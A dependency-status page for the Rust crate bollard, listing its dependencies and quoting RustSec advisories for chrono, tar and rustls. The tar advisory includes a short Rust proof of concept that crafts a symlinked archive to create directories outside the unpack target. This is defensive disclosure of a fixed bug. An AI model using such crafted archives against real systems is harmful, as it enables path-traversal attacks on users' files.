This project might be open to known security vulnerabilities, which can be prevented by tightening the version range of affected dependencies. Find detailed information at the bottom.

Crate bollard

Dependencies

(39 total, 1 outdated, 2 possibly insecure)

CrateRequiredLatestStatus
 base64^0.220.22.1up to date
 bollard-buildkit-proto=0.4.00.4.0up to date
 bollard-stubs=1.45.0-rc.26.0.11.41.0up to date
 bytes^11.7.2up to date
 chrono ⚠️^0.40.4.38maybe insecure
 futures-core^0.30.3.30up to date
 futures-util^0.30.3.30up to date
 hex^0.40.4.3up to date
 home^0.50.5.9up to date
 http^1.11.1.0up to date
 http-body-util^0.10.1.2up to date
 hyper^1.31.4.1up to date
 hyper-named-pipe^0.1.00.1.0up to date
 hyper-rustls^0.270.27.3up to date
 hyper-util^0.1.50.1.8up to date
 hyperlocal^0.9.00.9.1up to date
 log^0.40.4.22up to date
 num^0.40.4.3up to date
 pin-project-lite^0.20.2.14up to date
 rand^0.80.8.5up to date
 rustls ⚠️^0.230.23.13maybe insecure
 rustls-native-certs^0.7.00.8.0out of date
 rustls-pemfile^2.12.1.3up to date
 rustls-pki-types^1.71.8.0up to date
 serde^1.01.0.210up to date
 serde_derive^1.01.0.210up to date
 serde_json^1.01.0.128up to date
 serde_repr^0.10.1.19up to date
 serde_urlencoded^0.70.7.1up to date
 thiserror^1.01.0.63up to date
 time^0.30.3.36up to date
 tokio^1.381.40.0up to date
 tokio-stream^0.10.1.16up to date
 tokio-util^0.70.7.12up to date
 tonic^0.120.12.2up to date
 tower-service^0.30.3.3up to date
 url^2.52.5.2up to date
 webpki-roots^0.260.26.6up to date
 winapi^0.3.90.3.9up to date

Dev dependencies

(7 total, 1 possibly insecure)

CrateRequiredLatestStatus
 flate2^1.01.0.33up to date
 once_cell^1.191.19.0up to date
 tar ⚠️^0.40.4.41maybe insecure
 termion^4.04.0.2up to date
 tokio^1.381.40.0up to date
 tokio-util^0.70.7.12up to date
 yup-hyper-mock^8.0.08.0.0up to date

Security Vulnerabilities

chrono: Potential segfault in `localtime_r` invocations

RUSTSEC-2020-0159

Impact

Unix-like operating systems may segfault due to dereferencing a dangling pointer in specific circumstances. This requires an environment variable to be set in a different thread than the affected functions. This may occur without the user's knowledge, notably in a third-party library.

Workarounds

No workarounds are known.

References

tar: Links in archive can create arbitrary directories

RUSTSEC-2021-0080

When unpacking a tarball that contains a symlink the tar crate may create directories outside of the directory it's supposed to unpack into.

The function errors when it's trying to create a file, but the folders are already created at this point.

use std::{io, io::Result};
use tar::{Archive, Builder, EntryType, Header};

fn main() -> Result<()> {
    let mut buf = Vec::new();

    {
        let mut builder = Builder::new(&mut buf);

        // symlink: parent -> ..
        let mut header = Header::new_gnu();
        header.set_path("symlink")?;
        header.set_link_name("..")?;
        header.set_entry_type(EntryType::Symlink);
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        // file: symlink/exploit/foo/bar
        let mut header = Header::new_gnu();
        header.set_path("symlink/exploit/foo/bar")?;
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty())?;

        builder.finish()?;
    };

    Archive::new(&*buf).unpack("demo")
}

This has been fixed in https://github.com/alexcrichton/tar-rs/pull/259 and is published as tar 0.4.36. Thanks to Martin Michaelis (@mgjm) for discovering and reporting this, and Nikhil Benesch (@benesch) for the fix!

rustls: `rustls::ConnectionCommon::complete_io` could fall into an infinite loop based on network input

RUSTSEC-2024-0336

If a close_notify alert is received during a handshake, complete_io does not terminate.

Callers which do not call complete_io are not affected.

rustls-tokio and rustls-ffi do not call complete_io and are not affected.

rustls::Stream and rustls::StreamOwned types use complete_io and are affected.